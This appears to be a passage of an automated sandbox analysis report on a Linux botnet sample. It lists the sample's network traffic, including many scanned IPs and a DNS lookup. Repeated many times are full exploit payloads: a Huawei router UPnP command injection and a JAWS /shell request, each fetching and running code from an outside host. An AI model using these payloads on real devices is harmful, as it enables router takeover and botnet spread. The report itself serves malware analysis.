3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: /tmp/x86_64.elf (PID: 6216)Socket: 127.0.0.1:46157Jump to behavior
          Source: unknownDNS traffic detected: query: scamanje.stresserit.pro replaycode: Name error (3)
          Source: unknownTCP traffic detected without corresponding DNS query: 48.182.102.28
          Source: unknownTCP traffic detected without corresponding DNS query: 201.87.194.67
          Source: unknownTCP traffic detected without corresponding DNS query: 203.37.56.95
          Source: unknownTCP traffic detected without corresponding DNS query: 27.72.250.28
          Source: unknownTCP traffic detected without corresponding DNS query: 18.206.31.141
          Source: unknownTCP traffic detected without corresponding DNS query: 199.109.228.164
          Source: unknownTCP traffic detected without corresponding DNS query: 101.255.81.175
          Source: unknownTCP traffic detected without corresponding DNS query: 199.214.122.189
          Source: unknownTCP traffic detected without corresponding DNS query: 54.207.24.157
          Source: unknownTCP traffic detected without corresponding DNS query: 59.166.23.54
          Source: unknownTCP traffic detected without corresponding DNS query: 31.38.117.3
          Source: unknownTCP traffic detected without corresponding DNS query: 164.251.30.181
          Source: unknownTCP traffic detected without corresponding DNS query: 61.135.143.195
          Source: unknownTCP traffic detected without corresponding DNS query: 104.56.171.136
          Source: unknownTCP traffic detected without corresponding DNS query: 136.56.226.117
          Source: unknownTCP traffic detected without corresponding DNS query: 97.145.122.207
          Source: unknownTCP traffic detected without corresponding DNS query: 208.93.5.2
          Source: unknownTCP traffic detected without corresponding DNS query: 169.35.85.203
          Source: unknownTCP traffic detected without corresponding DNS query: 66.192.213.135
          Source: unknownTCP traffic detected without corresponding DNS query: 58.147.73.171
          Source: unknownTCP traffic detected without corresponding DNS query: 155.1.16.4
          Source: unknownTCP traffic detected without corresponding DNS query: 184.236.188.55
          Source: unknownTCP traffic detected without corresponding DNS query: 185.113.69.208
          Source: unknownTCP traffic detected without corresponding DNS query: 216.218.185.78
          Source: unknownTCP traffic detected without corresponding DNS query: 168.147.66.219
          Source: unknownTCP traffic detected without corresponding DNS query: 161.84.134.11
          Source: unknownTCP traffic detected without corresponding DNS query: 53.169.165.68
          Source: unknownTCP traffic detected without corresponding DNS query: 195.103.148.191
          Source: unknownTCP traffic detected without corresponding DNS query: 51.239.194.79
          Source: unknownTCP traffic detected without corresponding DNS query: 5.188.2.157
          Source: unknownTCP traffic detected without corresponding DNS query: 154.54.207.41
          Source: unknownTCP traffic detected without corresponding DNS query: 20.84.253.217
          Source: unknownTCP traffic detected without corresponding DNS query: 114.186.81.20
          Source: unknownTCP traffic detected without corresponding DNS query: 219.130.135.82
          Source: unknownTCP traffic detected without corresponding DNS query: 108.148.101.115
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.191.128
          Source: unknownTCP traffic detected without corresponding DNS query: 176.172.68.175
          Source: unknownTCP traffic detected without corresponding DNS query: 174.212.102.123
          Source: unknownTCP traffic detected without corresponding DNS query: 159.188.128.182
          Source: unknownTCP traffic detected without corresponding DNS query: 9.28.92.198
          Source: unknownTCP traffic detected without corresponding DNS query: 184.149.247.127
          Source: unknownTCP traffic detected without corresponding DNS query: 180.234.31.110
          Source: unknownTCP traffic detected without corresponding DNS query: 38.53.177.100
          Source: unknownTCP traffic detected without corresponding DNS query: 186.147.27.27
          Source: unknownTCP traffic detected without corresponding DNS query: 48.236.85.101
          Source: unknownTCP traffic detected without corresponding DNS query: 149.6.117.152
          Source: unknownTCP traffic detected without corresponding DNS query: 5.117.219.227
          Source: unknownTCP traffic detected without corresponding DNS query: 146.235.228.42
          Source: unknownTCP traffic detected without corresponding DNS query: 202.255.36.14
          Source: unknownTCP traffic detected without corresponding DNS query: 130.207.17.102
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
